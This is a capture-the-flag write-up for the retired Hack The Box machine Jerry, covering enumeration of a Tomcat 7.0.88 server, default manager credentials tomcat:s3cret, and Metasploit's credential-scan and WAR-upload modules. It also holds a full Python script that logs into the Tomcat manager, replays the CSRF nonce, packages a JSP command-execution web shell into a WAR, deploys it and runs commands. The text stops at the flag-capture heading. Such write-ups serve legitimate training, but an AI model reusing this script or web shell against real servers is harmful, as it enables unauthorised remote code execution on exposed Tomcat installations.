Thursday, March 21, 2019

Jerry


JERRY

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Jerry, which is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

Jerry's IP is 10.10.10.95:




- Scanning with Nmap, there is only one open port, 8080:




- Scanning deeper:




- So we have an Apache Tomcat 7.0.88 web server (Apache-Coyote JSP engine 1.1) listening on port 8080.

- Connecting with the browser:





- Clicking any tab, the user is prompted with an HTTP Basic authentication login form:





- However, when clicking Cancel the answer is Tomcat's default 401 Unauthorized page, which includes an example tomcat-users.xml entry with the credentials tomcat:s3cret. Those example credentials happen to be the ones actually configured on Jerry.





3 - EXPLOITATION


- Another way to find valid credentials would be to use Metasploit's auxiliary module auxiliary/scanner/http/tomcat_mgr_login, which tries a list of default username/password pairs against the manager application:




- Setting options:





- After running the module for a while, the same credentials as before (tomcat:s3cret) are found:






- Metasploit also provides an exploit module, exploit/multi/http/tomcat_mgr_upload, for an Apache Tomcat server whose "manager" application is exposed with valid credentials: it uploads a WAR file containing the payload through the manager interface, and Tomcat deploys and executes it:




- Using this module:





- Setting options (using the exposed credentials tomcat:s3cret) and running the exploit, we get a Meterpreter session:






- Spawning a shell:
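The two Metasploit steps above (the credential check of tomcat_mgr_login and the WAR upload of tomcat_mgr_upload) reduce to a handful of HTTP requests against the Tomcat 7 manager application. The script below is an added example written for this page; it is not the write-up's own code nor Metasploit's. It assumes (hypothetically) that the manager is at /manager/html on 10.10.10.95:8080, that the account has the manager-gui role (which is what the 401 page's example entry grants and what the HTML upload form requires), and it carries its own small command-execution JSP rather than a Metasploit payload. SAMPLE_MANAGER_HTML is a constructed stand-in for the real manager page; only the pure helpers run offline, the network functions need a live target.

```python
import base64
import io
import re
import urllib.error
import urllib.parse
import urllib.request
import zipfile

TARGET = "http://10.10.10.95:8080"   # Jerry's IP and port from the Nmap scan
CREDS = ("tomcat", "s3cret")         # credentials leaked by the 401 page
NONCE_PARAM = "org.apache.catalina.filters.CSRF_NONCE"

# Minimal JSP "web shell" (our own, not Metasploit's): runs ?cmd=... and
# echoes its stdout.  This is the kind of payload a WAR-upload exploit carries.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<% String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
} %>
"""
WEB_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
           '<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"/>\n')

# Constructed stand-in for the manager page: the CSRF nonce appears in the
# query string of every link and form action on the real page.
SAMPLE_MANAGER_HTML = ('<form method="post" action="/manager/html/upload?'
                       'org.apache.catalina.filters.CSRF_NONCE=1A2B3C4D" '
                       'enctype="multipart/form-data">')


def basic_auth_header(user, password):
    """Value of the HTTP Basic Authorization header the manager expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def classify_login(status):
    """Map the /manager/html status code to what tomcat_mgr_login reports."""
    return {200: "valid", 401: "invalid", 403: "valid, but no manager role"}.get(
        status, f"unexpected HTTP {status}")


def check_credentials(base_url, user, password, timeout=10):
    """GET /manager/html with Basic auth; return (verdict, page body)."""
    req = urllib.request.Request(f"{base_url}/manager/html")
    req.add_header("Authorization", basic_auth_header(user, password))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_login(resp.status), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return classify_login(e.code), ""


def build_war(app_name, jsp_source):
    """Pack a JSP plus a minimal WEB-INF/web.xml into a WAR (a plain zip) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(f"{app_name}.jsp", jsp_source)
        war.writestr("WEB-INF/web.xml", WEB_XML)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted entry names of a WAR, to verify what build_war produced."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def extract_csrf_nonce(html):
    """Tomcat 7 fronts the manager with CsrfPreventionFilter; the nonce from the
    page must be replayed on the upload URL or the POST is rejected with 403."""
    m = re.search(re.escape(NONCE_PARAM) + r'=([^"&]+)', html)
    return m.group(1) if m else None


def multipart_body(field, filename, content, boundary):
    """Single-file multipart/form-data body, as the manager's upload form sends."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def deploy_war(base_url, user, password, app_name, war_bytes, timeout=10):
    """What tomcat_mgr_upload does: fetch the nonce, then POST the WAR to
    /manager/html/upload.  Tomcat deploys it under /<app_name>/."""
    _, page = check_credentials(base_url, user, password, timeout)
    nonce = extract_csrf_nonce(page)
    if nonce is None:
        raise RuntimeError("no CSRF nonce in manager page (login failed?)")
    boundary = "----WarUploadBoundary"
    body = multipart_body("deployWar", f"{app_name}.war", war_bytes, boundary)
    req = urllib.request.Request(
        f"{base_url}/manager/html/upload?{NONCE_PARAM}={nonce}", data=body, method="POST")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status   # 200 once urllib follows Tomcat's redirect back to the list


def run_command(base_url, app_name, cmd, timeout=10):
    """Execute a command through the deployed JSP and return its output."""
    url = f"{base_url}/{app_name}/{app_name}.jsp?cmd={urllib.parse.quote(cmd)}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    verdict, _ = check_credentials(TARGET, *CREDS)
    print(f"{CREDS[0]}:{CREDS[1]} -> {verdict}")
    if verdict == "valid":
        deploy_war(TARGET, *CREDS, "shell", build_war("shell", CMD_JSP))
        print(run_command(TARGET, "shell", "whoami"))
```

The 403 branch of classify_login is the case tomcat_mgr_login flags separately: the password is right but the user has no manager role, so the upload step would fail. The nonce fetch is what distinguishes a Tomcat 7 manager from older versions; without it the upload is rejected even with valid credentials.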




4 - CAPTURING THE FLAGS

- In this case both flags are in the same text file: